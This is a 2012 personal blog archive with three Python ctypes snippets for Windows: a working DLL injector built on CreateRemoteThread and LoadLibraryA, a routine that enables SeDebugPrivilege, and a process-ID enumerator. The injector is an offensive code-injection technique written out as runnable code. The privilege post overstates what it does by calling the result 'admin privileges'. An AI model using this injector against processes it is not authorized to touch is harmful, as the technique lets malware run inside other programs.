______ Y ______
My own personal time capsule.
Category Archives: process
DLL Injection in python
February 7, 2012
Posted by on Following code utilises kernel32.CreateRemoteThread function to add a thread with the selected DLL to the selected process ( also known as DLL injection ). Following steps are executed :
1) Get Process Handle (by PID)
2) Allocate space for dll path
3) Write dll path to the process selected in step 1
4) Resolve address of kernel32.dll & LoadLibraryA function
5) Use info from step 2,3,4 to call kernel32.CreateRemoteThread with specified DLL
6) DLL Injected ;D
print "[+] Universal DLL Injector by Y" print "[+] contact : If you know me then give me a shout" print "[+] usage: ./dll_injector.py <PID> <DLLPATH>" print "\n" from ctypes import * import sys,ctypes # Define constants we use PAGE_RW_PRIV = 0x04 PROCESS_ALL_ACCESS = 0x1F0FFF VIRTUAL_MEM = 0x3000 #CTYPES handler kernel32 = windll.kernel32 def dll_inject(PID,DLL_PATH): print "[+] Starting DLL Injector" LEN_DLL = len(DLL_PATH)# get the length of the DLL PATH print "\t[+] Getting process handle for PID:%d " % PID hProcess = kernel32.OpenProcess(PROCESS_ALL_ACCESS,False,PID) if hProcess == None: print "\t[+] Unable to get process handle" sys.exit(0) print "\t[+] Allocating space for DLL PATH" DLL_PATH_ADDR = kernel32.VirtualAllocEx(hProcess, 0, LEN_DLL, VIRTUAL_MEM, PAGE_RW_PRIV) bool_Written = c_int(0) print "\t[+] Writing DLL PATH to current process space" kernel32.WriteProcessMemory(hProcess, DLL_PATH_ADDR, DLL_PATH, LEN_DLL, byref(bool_Written)) print "\t[+] Resolving Call Specific functions & libraries" kernel32DllHandler_addr = kernel32.GetModuleHandleA("kernel32") print "\t\t[+] Resolved kernel32 library at 0x%08x" % kernel32DllHandler_addr LoadLibraryA_func_addr = kernel32.GetProcAddress(kernel32DllHandler_addr,"LoadLibraryA") print "\t\t[+] Resolve LoadLibraryA function at 0x%08x" %LoadLibraryA_func_addr thread_id = c_ulong(0) # for our thread id print "\t[+] Creating Remote Thread to load our DLL" if not kernel32.CreateRemoteThread(hProcess, None, 0, LoadLibraryA_func_addr, DLL_PATH_ADDR, 0, byref(thread_id)): print "Injection Failed, exiting" sys.exit(0) else: print "Remote Thread 0x%08x created, DLL code injected" % thread_id.value PID = int(sys.argv[1]) DLL_PATH = str(sys.argv[2]) dll_inject(PID, DLL_PATH)
Universal Process Privilage Escalation
January 29, 2012
Posted by on By adjusting process token its possible to elevate your current process privileges to enable certain functionality not available otherwise.
Basically steps we follow are :
1) Get current process handle
2) Get current process token
3) Resolve SeDebugPrivilege value
4) Created new Token with the resolved value from step 3
5) Adjust the token of the current process with new privilege
6) Close process handle
Following code demonstrates the principle.
print "[+] Universal Process Escalation by Y" print "[+] contact : If you know me then give me a shout" from ctypes import windll import ctypes from ctypes import * class TOKEN_PRIVS(ctypes.Structure): _fields_ = ( ("PrivilegeCount", ULONG), ("Privileges", ULONG * 3 ) ) def get_debug_privs(): # Adjust Current TOKEN token = HANDLE() print "\t[+] Getting Current Token" flags = 40 # TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY windll.advapi32.OpenProcessToken(windll.kernel32.GetCurrentProcess(), 0x00000020, ctypes.byref(token)) print "\t[+] Calculating Local SeDebugPrivilege" admin_priv_name = "SeDebugPrivilege" # we want this priv on the process pBytesReturned = ctypes.c_ulong() windll.advapi32.LookupPrivilegeValueA(None,admin_priv_name,ctypes.byref(pBytesReturned)) print "\t[+] Resolved SeDebugPrivilege as %d" % pBytesReturned.value print "\t[+] Modifying TOKEN Structure to enable Debug" privs = TOKEN_PRIVS() privs.PrivilegeCount = 1 privs.Privileges = (pBytesReturned.value,0, 2) print "\t[+] Adjusting Privileges of the current process" windll.advapi32.AdjustTokenPrivileges(token, 0, ctypes.byref(privs),0,0,0) print "\t[+] Closing current handle, almost done" windll.kernel32.CloseHandle(token) print "[+] Done, your process " , windll.kernel32.GetCurrentProcessId(), "has now admin privileges" ############ CURRENT TOKEN ADJUSTED ################## get_debug_privs()
PID Enumeration on Windows with pure python ctypes
January 27, 2012
Posted by on Following code will enumerate process ID’s on the current system by calling EnumProcesses from psapi on Windows. Should for for majority of windows distributions that have psapi.dll in %systemroot%.
from ctypes import * psapi = windll.psapi print "[+] PID dumper by Y" print "[+] contact : If you know me then give me a shout" def getListOfProcesses(): max_array = c_ulong * 4096 # define long array to capture all the processes pProcessIds = max_array() # array to store the list of processes pBytesReturned = c_ulong() # the number of bytes returned in the array #EnumProcess psapi.EnumProcesses(byref(pProcessIds), sizeof(pProcessIds), byref(pBytesReturned)) # get the number of returned processes nReturned = pBytesReturned.value/sizeof(c_ulong()) pidProcessArray = [i for i in pProcessIds][:nReturned] for processes in pidProcessArray: print "[+] Running Process PID %d" % processes getListOfProcesses()